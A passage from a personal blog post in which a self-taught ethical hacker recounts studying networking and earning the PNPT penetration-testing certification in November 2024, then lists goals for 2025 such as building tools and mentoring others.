Starting from there, one day I came across the 2023 roadmap for an ethical hacker by The Cyber Mentor @TCM Security, which gave me a clear pathway of where to go. However, an updated version for 2025 was published recently, which you can see below:
PNPT
As I got to TCM Security, I heard about their most famous cert, the PNPT (Practical Network Penetration Tester). I started preparing for it at the start of 2024. The first course I started doing was the PEH (Practical Ethical Hacking) course. But I realized that my networking skills weren't up to the mark, so I left that there and went to do a networking course from YouTube. I did the CCNA course from networkchuck, though there are a hell of a lot of other options available as well.
With my networking skills improved, I went back to working on my goal of getting the PNPT certification. After months of hard work and focus, I was able to achieve it in November 2024—something I couldn’t have done without the help and blessings of ALLAH.
I’ll be sharing a detailed review of the exam, packed with tips and resources to help you pass on your first attempt. Stay tuned!
Feel free to explore the About page to learn more about me!
croc, What’s next?
I have set several goals for 2025, and inshALLAH, I am determined to achieve them:
G1: Projects
I plan to work on some projects that solve real world pentesting challenges and streamline the pentester’s workflow.
G2: Being a Cyber Mentor
Knowledge shared is knowledge multiplied. Hence, I aim to become a cyber mentor and give back to the community. Feel free to DM me on Discord if you need help with anything. My username is, you all know, @croclius.
G3: Repeat, Repeat & Repeat
Repetition is the foundation of mastery in cybersecurity. I plan on revisiting my notes and practicing stuff back and forth until it becomes second nature.
Final Thoughts
I am determined to provide you with as much value as possible and look forward to your strong support on this journey. Thanks for checking out my blog!